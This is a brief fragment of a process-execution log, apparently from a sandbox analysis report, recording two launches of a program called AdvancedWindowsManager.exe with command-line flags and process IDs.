C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:3376
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:3516
-